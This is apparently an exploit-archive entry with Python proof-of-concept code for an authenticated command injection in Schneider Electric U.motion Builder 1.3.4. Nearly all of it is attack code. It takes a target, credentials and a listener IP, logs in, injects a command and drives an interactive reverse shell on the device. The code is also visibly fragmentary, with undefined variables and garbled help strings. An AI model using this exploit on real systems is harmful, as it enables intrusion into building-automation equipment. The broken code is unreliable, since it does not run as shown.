Exploits / Vulnerability Discovered : 2020-02-03 |
Type : webapps |
Platform : hardware
This exploit / vulnerability Schneider electric u.motion builder 1.3.4 authenticated command injection is for educational purposes only and if it is used you will do on your own risk!
from __future__ import print_function
import httplib
import urllib
import argparse
import re
import sys
import socket
import threading
import time
parser = argparse.ArgumentParser(description='PoC')
parser.add_argument('--target', help='IP or hostname of target', required=True)
parser.add_argument('--port', help='TCP port the target app is running', required=True, default='8080')
parser.add_argument('--username', help='TCP port the target app is running', required=True, default='admin')
parser.add_argument('--password', help='TCP port the target app is running', required=True, default='admin')
parser.add_argument('--command', help='malicious command to run', default='shell')
parser.add_argument('--src_ip', help='IP of listener for the reverse shell', required=True)
parser.add_argument('--timeout', help='time in seconds to wait for a response', type=int, default=3)
class Exploiter(threading.Thread):
def __init__ (self, target, port, timeout, uri, body, headers, shell_mode):
threading.Thread.__init__(self)
self.target = target
self.port = port
self.timeout = timeout
self.uri = uri
self.body = body
self.headers = headers
self.shell_mode = shell_mode
try:
response = conn.getresponse()
if not self.shell_mode: print(str(response.status) + " " + response.reason)
data = response.read()
if not self.shell_mode: print('Response: {0}\r\nCheck the exploit result'.format(data))
except socket.timeout:
if not self.shell_mode: print("Connection timeout while waiting response from the target.\r\nCheck the exploit result")
while 1:
comm = raw_input("shell$ ").strip()
if comm == "quit":
conn.close()
sys.exit(0)
if comm != "":
conn.send(comm + " 2>&1" + "\x0a")
while 1:
data = conn.recv(BUFFER_SIZE)
if not data: break
print(data, end="")
if "\x0a" in data: break
except Exception as ex:
print("Could not start listener")
print(ex)
def login(target, port, username, password):
uri = "http://{0}:{1}/umotion/modules/system/user_login.php".format(target, port)
try:
conn = httplib.HTTPConnection("{0}:{1}".format(target, port))
conn.request("POST", uri, params, headers)
response = conn.getresponse()
print(str(response.status) + " " + response.reason)
data = response.read()
except socket.timeout:
print("Connection timeout while logging in. Check if the server is available")
return
content_type, body = encode_multipart_formdata(fields, files)
if not shell_mode or (shell_mode and listener and listener.isAlive()):
print('Logging in ...')
sess_id, login_seed = login(target, port, username, password)
if sess_id is None or login_seed is None:
print('Error while logging in')
return